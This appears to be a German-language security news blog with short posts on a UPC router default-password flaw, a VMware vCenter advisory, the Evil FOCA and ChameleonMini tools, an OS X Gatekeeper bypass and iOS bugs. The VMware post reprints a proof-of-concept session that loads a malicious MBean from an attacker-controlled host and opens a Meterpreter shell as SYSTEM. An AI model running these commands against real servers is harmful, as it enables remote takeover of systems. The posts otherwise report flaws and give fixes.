14 Jan

Achtung UPC Kunden – Standard WLAN Passwörter leicht zu hacken

hackedDer niederländische Sicherheitsforscher Peter Geissler hat ein Tool veröffentlicht mit dem sich die Standard Passwörter von einigen UPC Modems leicht berechnen lassen.

UPC Kunden sollten ihre WLAN Kennwörter so schnell wie möglich ändern.

Fehler:
Das WPA2 Kennwort bei UPC Modems wird aus der geheimen Seriennummer des Modems generiert und genau hier hat UPC ordentlich gepatzt. Die Seriennummer korrespondiert unerfreulicherweise leider mit der ESSID welche öffentlich einsehbar ist.
Dadurch lässt sich das Kennwort mit wenig aufwand berechnen.

UPC hat begonnen seine Kunden per Mail zu informieren.

Hier finden sie die Anleitung zum ändern des WLAN Kennworts der verschiednen Modems von UPC:
Link

13 Jan

ChameleonMini – NFC/RFID Pentesting Tool

Neues NFC / RFID Security und Pentest Tool.
Die frei programmierbare Plattform kann perfekte Klone von verschiedenen bestehenden kommerziellen Smartcards , einschließlich kryptographische Funktionen, erstellen.
Es kann für verschiedenste RFID und NFC Angriffsszenarien verwendet werden, z.B. replay und relay attacks sowie state restoration attacks oder NFC sniffing.

mehr unter: https://www.kickstarter.com/projects/1980078555/chameleonmini-a-versatile-nfc-card-emulator-and-mo

03 Okt

Kritische Lücke in VMware vCenter Server und ESXi

LOGO1

Advisory ID: VMSA-2015-0007
CVE Numbers: CVE-2015-5177 CVE-2015-2342 CVE-2015-1047

CVE-2015-5177 – kritisch
Fehler im JMX-RMI-Service im vCenter Server. – Remote Code Execution
Hier ist bereits ein Metasploit Modul verfügbar.

Proof of Concept:
root@Whack:/opt/mjet# nmap -sS 1.1.1.2 -p 9875 –script=/usr/share/nmap/scripts/rmi-dumpregistry.nse
Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-15 16:56 BST
Nmap scan report for 1.1.1.2
Host is up (0.00036s latency).
PORT STATE SERVICE
9875/tcp open java-rmi
| rmi-dumpregistry:
| jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @1.1.1.2:50966
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
MAC Address: 00:0C:29:D1:00:30 (VMware)
root@Whack:/opt/mjet# java -jar mjet.jar -t 1.1.1.2 -p 9875 -u http://1.1.1.1:8080/TArDcls4aeQZVWl
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
--------------------------------------------------- 
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://1.1.1.2:9875/jmxrmi ...
[+] Connected: rmi://1.1.1.2 16
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://1.1.1.1:8080/TArDcls4aeQZVWl
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: drmwfzvo:name=NApCjRCB,id=gsKsVVHK
[+] Invoking: metasploit.Metasploit.run()
[+] Done
Metasploit Shell
-------------------------
2015-02-24 10:11:44 +0000 S:0 J:3 msf exploit(java_mlet_server) >
[*] Using URL: http://1.1.1.1:8080/TArDcls4aeQZVWl
[*] Server started.
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl/
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] Sending stage (30355 bytes) to 1.1.1.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 1.1.1.2:50456) at 2015-02-24 10:12:32 +0000
 
2015-02-24 10:14:10 +0000 S:1 J:3 msf exploit(java_mlet_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: SYSTEM

CVE-2015-5177:
Fehler in der OpenSLP-Funktion – Remote Code Execution
Betroffene Versionen 5.0, 5.1 und 5.5

CVE-2015-1047:
Der vpxd Service bei den Versionen 5.0,5.1 und 5.5 ist für DoS-Attacken anfällig.

Entsprechende Updates sind bei VMware bereits verfügbar.

02 Okt

Evil FOCA – Network Attack Tool

Evil FOCA ist ein Windows Tool zum überprüfen der Sicherheit von IPV4 und IPV6 Netzen für Pentester und Auditoren.

Folgende Attacken sind möglich:

  • MITM über IPV4 mit ARP spoofing und DHCP ACK Injections.
  • MITM über IPV6 mit Neighbor Advertisment Spooing, SLAAC attacks und fake DHCPv6
  • DoS auf IPV4 mit ARP Spoofing
  • DoS auf IPV6 mit SLAAC DoS
  • DNS Hijacking

Evil FOCA scannt automatisch das gesammte Netz, alle Geräte und deren Netzwerkinterfaces, und fügt alle IPV6, IPV4 und Physische Adressen in ein intuitives Interface ein.

Evil Foca is released under the GNU Public License 3.0
Link

01 Okt

Bypass Apple’s Gatekeeper – Malware auf den Mac schmuggeln

Der leitende Sicherheitsforscher Wardle hat den Sicherheitsmechanismus „Gatekeeper“ von Apples Betriebssystem OS X umgangen und unsignierten Code ausgeführt.

Der Gatekeeper überprüft Programme vor der Installation und prüft, ob diese aus einer vertrauenswürdigen Quelle stammen. Wenn das der Fall ist, sind diese entsprechend signiert und das Programm kann installiert werden. Wardle zeigte jedoch auf, dass man diese Überprüfung vergleichsweise einfach umgehen kann.

Als Einfallstor setzte Wardle auf eine von Apple als vertrauenswürdig eingestufte Binär-Datei. In seinem Test packte er diese in ein Apple Disk Image, welche er mit einer weiteren, nicht-signierten Anwendung auffüllte.

Beim Installieren hat Gatekeeper die signierte Binär-Datei als vertrauenswürdig eingestuft und im gleichen Zuge auch die nicht-signierte Anwendung durchgewinkt und ausgeführt. Das passiert, weil Gatekeeper nur die erste Anwendung prüft und das folgende nicht mehr.

(teilw. ct anw)

11 Jun

Stealing iCloud Passwords made easy!

IOS-Mail.app Inject-Kit

jansoucek found a bug in the Apple IOS 8.3 Mail.app, resulting in „meta http-equiv=refresh HTML tag in email messages not being ignored. This bug allows remote HTML content to be loaded, replacing the content of the original email message. With simple HTML and CSS its possible to build a functional password „collector“.

This bug was published to Apple on 15.01.2015 but the fix is not delivered till now

Source and Proof of concept code is available on github.

Demo:

03 Jun

OWASP Zed Attack Proxy (ZAP)

The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen testers toolbox.

With its automated scanner and powerful REST API, ZAP fits seamlessly into your continuous integration environment, allowing you to automate the finding of common issues while you’re still in development.

Source: OWASP

03 Jun

How to Fix iPhone / iPad / AppleWatch Crash Text Message Bug

iPhone´s and Apple Watches are vulnerable to get crashed when the phone receives a special crafted string of characters via text message, snapchat, and twitter.

Here’s a three-step process to combat the issue:

You can do this simple workaround in the meantime before Apple patches the bug in order to open your Messages app:

1. Ask Siri to „read unread messages.“
2. Use Siri to reply to the malicious message. After you reply, you’ll be able to open Messages again.
3. If the issue continues, tap and hold the malicious message, tap More, and delete the message from the thread.

Following these simple steps would let you successfully access your Messages again. However, this procedure will provide only a temporary fix for the iPhone crash text bug.